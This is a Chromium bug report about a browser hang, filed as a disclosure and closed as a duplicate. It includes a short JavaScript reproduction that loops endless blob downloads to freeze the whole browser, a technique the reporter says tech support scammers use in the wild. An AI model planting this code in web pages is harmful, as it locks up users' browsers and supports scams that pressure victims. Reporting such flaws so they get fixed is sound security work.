New issue
Advanced search Search tips
Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 809775
Owner: ----
Closed: Feb 7
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug



Sign in to add a comment

Hang bug with window.navigator.msSaveOrOpenBlob

Reported by malwarei...@gmail.com, Feb 7

Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36

Steps to reproduce the problem:
The following code will cause the freeze issue:

function download(g, h, j) {
    var k = new Blob([g], {
        type: j
    });
    if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
    else {
        var l = document.createElement("a"),
            m = URL.createObjectURL(k);
        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
    }
}
function bomb_ch() {
    var g = Math.random().toString(36).substring(20),
        h = Math.floor(50 * Math.random() + 25);
    while (true) download(h, g, g)
}
function ch_jam() {
    bomb_ch()
}
setInterval(ch_jam, 0.5);

What is the expected behavior?
A dialog asking users if they want to allow multiple file downloads should show up and allow users to stop this process. Alternately, a dialog that the browser is jammed should come up.

What went wrong?
Within a few seconds the entire browser freezes, with CPU maxed at 100%. The user cannot close any tab or browser.

Crashed report ID: No

How much crashed? Whole browser

Is it a problem with a plugin? No 

Did this work before? N/A 

Chrome version: 64.0.3282.140  Channel: stable
OS Version: 10.0
Flash Version: 

This flaw is currently being used in the wild by tech support scammers: https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
 
bomb_ch.html
851 bytes View Download
Mergedinto: 809775
Status: Duplicate (was: Unconfirmed)

Sign in to add a comment